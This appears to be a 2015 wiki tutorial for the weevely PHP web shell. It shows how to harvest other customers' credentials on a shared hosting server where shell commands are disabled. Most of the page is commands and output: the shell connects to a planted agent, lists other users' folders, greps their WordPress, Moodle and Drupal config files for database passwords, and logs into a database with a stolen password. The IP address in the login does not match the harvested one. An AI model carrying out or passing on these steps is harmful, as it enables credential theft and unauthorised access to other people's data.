Harvest other users credentials

Emilio edited this page Apr 25, 2015 · 3 revisions

This tutorial shows how to harvest other users credentials in a shared hosting server which does not allow shell commands execution.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: file_grep (grep)

Session

Find a nice folder containing the other users web folders.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> ls
.
..
members
www-data@target:/var/www PHP> cd members
www-data@target:/var/www/members PHP> ls
.
..
alefst
anssot
latrwo
leempt
martol
natsta
rogjas
rotozy
tstanc
virots
yynost
www-data@target:/var/www/members PHP>

Now run the grep command (an alias for the file_grep module) with a raw regexp to find some hard-coded password stored in other users PHP scripts. The used regular expression skips all the lines with previous comments (^[^*/#]) and that contains the word pass eventually trailed with word.

www-data@target:/var/www/members PHP> grep . '^[^*/#]*passw?o?r?d?'
./virots/config.php:$CFG->dbpass    = 'FFFklasdhas()asdjj';   // your database password
./anssot/moodle/config.php:$CFG->dbpass    = 'kasdhBSAUIGS77&';   // your database password
./leempt/wp/wp-config.php:define('DB_PASSWORD', 'AShasjdh177!@');
./alefst/wordpress/wp-config.php:define('DB_PASSWORD', 'ajhfaifh123!');
./martol/wordpress/wp-config.php:define('DB_PASSWORD', 'monkeydust1234');
./yynost/sites/default/settings.php:    'password' => 'XXyyynotsgoghia(XX',
./martol/drupal-7.x/sites/default/settings.php:    'password' => 'jhj@&&hgdas98k',
./natsta/drupal/sites/default/settings.php:    'password' => '99copacabana',
www-data@target:/var/www/members PHP> 

We found 8 credentials with just one shot. We can try also grepping some statements to connect to mysql.

www-data@target:/var/www/members PHP> grep . 'mysql_conn'
./rotozy/joosep-lineon/db.php:$g_link = mysql_connect( '10.4.4.24', 'rotozy', 'rotozy123') or die();
www-data@target:/var/www/members PHP>

Let's test the latest one with sql_console module.

www-data@target:/var/www/members PHP> :sql_console -user rotozy -passwd rotozy123 -host 10.4.4.7
rotozy@server7 SQL> SELECT USER();
+----------------+
| rotozy@server7 |
+----------------+
rotozy@server7 SQL> 

Gotcha.

You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.